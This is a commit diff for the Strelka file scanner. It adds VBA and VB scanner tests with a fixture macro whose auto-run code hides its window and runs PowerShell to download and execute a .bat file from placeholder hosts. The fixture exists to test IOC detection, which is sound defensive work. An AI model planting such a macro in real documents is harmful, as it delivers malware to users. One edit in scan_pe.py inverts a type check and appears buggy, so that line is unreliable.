Formatting...

target · Jan 9, 2024 · 6aec6d6 · 6aec6d6
1 parent 5179e01
commit 6aec6d6
Show file tree

Hide file tree

Showing 11 changed files with 285 additions and 63 deletions.
diff --git a/src/python/strelka/scanners/scan_ole.py b/src/python/strelka/scanners/scan_ole.py
@@ -1,6 +1,8 @@
+import re
+
 import olefile
 import oletools
-import re
+
 from strelka import strelka
 
 

diff --git a/src/python/strelka/scanners/scan_pdf.py b/src/python/strelka/scanners/scan_pdf.py
@@ -1,8 +1,10 @@
-import fitz
 import io
 import re
 from collections import Counter
 from datetime import datetime, timezone
+
+import fitz
+
 from strelka import strelka
 
 # Suppress PyMuPDF warnings

diff --git a/src/python/strelka/scanners/scan_pe.py b/src/python/strelka/scanners/scan_pe.py
@@ -402,13 +402,13 @@ def scan(self, data, file, options, expire_at):
             return
 
         if rich_dict := parse_rich(pe):
-            if type(rich_dict) != str:
+            if type(rich_dict) is str:
                 self.event["rich"] = rich_dict
             else:
                 self.flags.append(rich_dict)
 
         if cert_dict := parse_certificates(data):
-            if type(cert_dict) != str:
+            if type(cert_dict) is str:
                 self.event["security"] = cert_dict
             else:
                 self.flags.append(cert_dict)

diff --git a/src/python/strelka/scanners/scan_vba.py b/src/python/strelka/scanners/scan_vba.py
@@ -1,5 +1,7 @@
 import logging
+
 from oletools import olevba
+
 from strelka import strelka
 
 logging.getLogger("olevba").setLevel(logging.WARNING)

diff --git a/src/python/strelka/scanners/scan_zip.py b/src/python/strelka/scanners/scan_zip.py
@@ -1,7 +1,9 @@
 import io
 import os
 import zlib
+
 import pyzipper
+
 from strelka import strelka
 
 
@@ -140,4 +142,4 @@ def scan(self, data, file, options, expire_at):
             except pyzipper.BadZipFile:
                 self.flags.append("bad_zip_file")
             except ValueError:
-                self.flags.append("value_error")
+                self.flags.append("value_error")
diff --git a/src/python/strelka/tests/fixtures/test.pdf b/src/python/strelka/tests/fixtures/test.pdf
diff --git a/src/python/strelka/tests/fixtures/test.vba b/src/python/strelka/tests/fixtures/test.vba
@@ -0,0 +1,30 @@
+Option Explicit
+Sub AutoOpen()
+'
+' AutoOpen Macro
+'
+
+MsgBox "Hello World!"
+
+End Sub
+
+
+Private Sub Document_Open()
+
+MsgBox "Hello World!"
+
+End Sub
+
+Private Sub Testing_Iocs()
+
+Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
+Set objStartup = objWMIService.Get("Win32_ProcessStartup")
+Set objConfig = objStartup.SpawnInstance_
+objConfig.ShowWindow = 0
+Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
+ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri https://www.test.example.com -OutFile $env:tmp\test.txt
+Start-Process -Filepath $env:tmp\invoice.one"
+ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri https://www.test.com/test.bat -OutFile $env:tmp\test.bat
+Start-Process -Filepath $env:tmp\test.bat"
+
+End Sub
diff --git a/src/python/strelka/tests/test_scan_pdf.py b/src/python/strelka/tests/test_scan_pdf.py
diff --git a/src/python/strelka/tests/test_scan_url.py b/src/python/strelka/tests/test_scan_url.py
@@ -1,6 +1,8 @@
 from pathlib import Path
 from unittest import TestCase, mock
 
+from pytest_unordered import unordered
+
 from strelka.scanners.scan_url import ScanUrl as ScanUnderTest
 from strelka.tests import run_test_scan
 
@@ -14,12 +16,14 @@ def test_scan_url_text(mocker):
     test_scan_event = {
         "elapsed": mock.ANY,
         "flags": [],
-        "urls": [
-            b"http://foobar.example.com",
-            b"ftp://barfoo.example.com",
-            b"example.com",
-            b"https://barfoo.example.com",
-        ],
+        "urls": unordered(
+            [
+                "example.com",
+                "http://foobar.example.com",
+                "https://barfoo.example.com",
+                "ftp://barfoo.example.com",
+            ]
+        ),
     }
 
     scanner_event = run_test_scan(
@@ -41,7 +45,7 @@ def test_scan_url_html(mocker):
     test_scan_event = {
         "elapsed": mock.ANY,
         "flags": [],
-        "urls": [b"https://example.com/example.js"],
+        "urls": ["https://example.com/example.js"],
     }
 
     scanner_event = run_test_scan(

diff --git a/src/python/strelka/tests/test_scan_vb.py b/src/python/strelka/tests/test_scan_vb.py
@@ -0,0 +1,90 @@
+from pathlib import Path
+from unittest import TestCase, mock
+
+from pytest_unordered import unordered
+
+from strelka.scanners.scan_vb import ScanVb as ScanUnderTest
+from strelka.tests import run_test_scan
+
+
+def test_scan_vb(mocker):
+    """
+    Pass: Sample event matches output of scanner.
+    Failure: Unable to load file or sample event fails to match.
+    """
+    test_scan_event = {
+        "elapsed": mock.ANY,
+        "flags": [],
+        "comments": ["AutoOpen Macro"],
+        "functions": ["AutoOpen", "Document_Open", "Testing_Iocs"],
+        "names": [
+            "Explicit",
+            "MsgBox",
+            "objWMIService",
+            "GetObject",
+            "objStartup",
+            "Get",
+            "objConfig",
+            "SpawnInstance_",
+            "ShowWindow",
+            "objProcess",
+            "ExecuteCmdAsync",
+        ],
+        "operators": ["="],
+        "strings": [
+            "Hello World!",
+            "winmgmts:\\\\\\\\.\\\\root\\\\cimv2",
+            "Win32_ProcessStartup",
+            "winmgmts:\\\\\\\\.\\\\root\\\\cimv2:Win32_Process",
+            "cmd /c powershell Invoke-WebRequest -Uri https://www.test.example.com -OutFile $env:tmp\\\\test.txt\\nStart-Process -Filepath $env:tmp\\\\invoice.one",
+            "cmd /c powershell Invoke-WebRequest -Uri https://www.test.com/test.bat -OutFile $env:tmp\\\\test.bat\\nStart-Process -Filepath $env:tmp\\\\test.bat",
+        ],
+        "script_length_bytes": 752,
+        "tokens": [
+            "Token.Keyword",
+            "Token.Name",
+            "Token.Text.Whitespace",
+            "Token.Name.Function",
+            "Token.Punctuation",
+            "Token.Comment",
+            "Token.Literal.String",
+            "Token.Operator",
+            "Token.Literal.Number.Integer",
+        ],
+        "urls": unordered(
+            [
+                "tmp\\\\invoice.one",
+                "https://www.test.com/test.bat",
+                "https://www.test.example.com",
+            ]
+        ),
+        "iocs": unordered(
+            [
+                {
+                    "ioc": "www.test.example.com",
+                    "ioc_type": "domain",
+                    "scanner": "ScanVb",
+                },
+                {
+                    "ioc": "https://www.test.example.com",
+                    "ioc_type": "url",
+                    "scanner": "ScanVb",
+                },
+                {"ioc": "www.test.com", "ioc_type": "domain", "scanner": "ScanVb"},
+                {
+                    "ioc": "https://www.test.com/test.bat",
+                    "ioc_type": "url",
+                    "scanner": "ScanVb",
+                },
+            ]
+        ),
+    }
+
+    scanner_event = run_test_scan(
+        mocker=mocker,
+        scan_class=ScanUnderTest,
+        fixture_path=Path(__file__).parent / "fixtures/test.vba",
+    )
+
+    TestCase.maxDiff = None
+    TestCase().assertDictEqual(test_scan_event, scanner_event)
diff --git a/src/python/strelka/tests/test_scan_vba.py b/src/python/strelka/tests/test_scan_vba.py
@@ -0,0 +1,59 @@
+from pathlib import Path
+from unittest import TestCase, mock
+
+from pytest_unordered import unordered
+
+from strelka.scanners.scan_vba import ScanVba as ScanUnderTest
+from strelka.tests import run_test_scan
+
+
+def test_scan_vba(mocker):
+    """
+    Pass: Sample event matches output of scanner.
+    Failure: Unable to load file or sample event fails to match.
+    """
+    test_scan_event = {
+        "elapsed": mock.ANY,
+        "flags": [],
+        "auto_exec": ["AutoOpen", "Document_Open"],
+        "base64": [],
+        "dridex": [],
+        "hex": [],
+        "ioc": [
+            "https://www.test.example.com",
+            "https://www.test.com/test.bat",
+            "test.bat",
+        ],
+        "iocs": unordered(
+            [
+                {"ioc": "test.bat", "ioc_type": "domain", "scanner": "ScanVba"},
+                {
+                    "ioc": "www.test.example.com",
+                    "ioc_type": "domain",
+                    "scanner": "ScanVba",
+                },
+                {
+                    "ioc": "https://www.test.example.com",
+                    "ioc_type": "url",
+                    "scanner": "ScanVba",
+                },
+                {"ioc": "www.test.com", "ioc_type": "domain", "scanner": "ScanVba"},
+                {
+                    "ioc": "https://www.test.com/test.bat",
+                    "ioc_type": "url",
+                    "scanner": "ScanVba",
+                },
+            ]
+        ),
+        "suspicious": ["powershell", "Start-Process", "ShowWindow", "GetObject"],
+        "total": {"extracted": 1, "files": 1},
+    }
+
+    scanner_event = run_test_scan(
+        mocker=mocker,
+        scan_class=ScanUnderTest,
+        fixture_path=Path(__file__).parent / "fixtures/test.vba",
+    )
+
+    TestCase.maxDiff = None
+    TestCase().assertDictEqual(test_scan_event, scanner_event)